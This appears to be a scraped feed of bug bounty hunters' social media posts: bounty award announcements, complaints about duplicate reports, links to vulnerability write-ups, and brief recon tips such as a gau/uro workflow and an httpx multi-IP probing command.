Dear bug bounty hunters, I want you to share more about the times when bug bounty programs have ripped you off. We don’t talk about it enough that’s why it keeps happening, and why these bug bounty platforms continue to fail to protect us. #BugBounty #Scam

When you’re counting on that one triaged report to pay the rent, and it turns out to be an internal duplicate 💀 #BugBounty

Hey #bugbounty hunters 👋 I wanna share how bug bounty completely changed my life 🧠💻 Two months ago, I moved to France 🇫🇷 , I was at one of the lowest points in my life. The only thing I really knew how to do was hack 😅 so I started a 30-day hacking challenge here on X. All

After you guys asked for an IDOR video, here it is! 🎥 I just dropped it on YouTube . go check it out and let me know what you think 😉 #BugBounty #BugBountytips #CyberSecurity #InfoSec #infosecurity youtube.com/watch?v=AWBhPa…

Posted check it out: youtu.be/nU9VnthcJmI?si…

All eyes on Sudan !!!

vulnerability I found in Signal Signal Desktop Path Traversal vulnerability in Attachment Saving medium.com/@h4x0r_dz/sign…

لا تعتاد لا تألف ولا تنسون السودان من دعائكم 🙏

the paper I mentioned earlier is ready + the latest discovery regarding the CVE patch bypass, which was made during its writing has been added; it should be published soon in the meantime, here's tonight's find, again on a big framework : a bizarre bug, just the way we like them

Yay, I was awarded a $2,250 bounty on HackerOne! hackerone.com/eye_ #TogetherWeHitHarder I AM BACK

I found an SQLi on the main app and I was able to execute any SQL function. They “fixed” it in two days and downgraded it to High, saying it was “read-only”💀 Anyway, below how I bypassed the WAF using parameter pollution #BugBounty #bugbountytips

Here’s my methodology (P.S. I’ve been terribly lazy lately) 1. I use gau to crawl the target (with api keys) 2. I use grep to filter junk and match question mark '?' 3. I use uro to get unique urls 4. I test params one by one Links to the tools below.

Yay, I was awarded a $7,000 bounty on HackerOne! hackerone.com/eye_ #TogetherWeHitHarder

$1,500 bounty on HackerOne! The maximum severity for DOM XSS and Reflected XSS is Medium in their policy. But if ryuku uses his magic, the bonus will come ;) hackerone.com/eye_ #TogetherWeHitHarder

We unfortunately won’t be able to publish our latest paper before the end of 2025 as the maintainers chose to delay it until early January. Still, it’s been a productive year of zero-day discoveries, with a focus on frameworks, many of which were shared on the blog. 2025 Recap:

honored to see two of my research works selected for the initial nominations they’ve been the most fruitful for me in practice, with ongoing discoveries of vuln assets, incl. several major platforms, and six figures in rewards If they helped you in any way, consider voting-14/01

Stop missing attack surface behind Round Robin DNS. 🛑 By default, tools often check just one IP. Force httpx to enumerate ALL resolved A records for every subdomain using -probe-all-ips. Use this Command👇 httpx -l live_hosts.txt -probe-all-ips -silent -o multi_ip_hosts.txt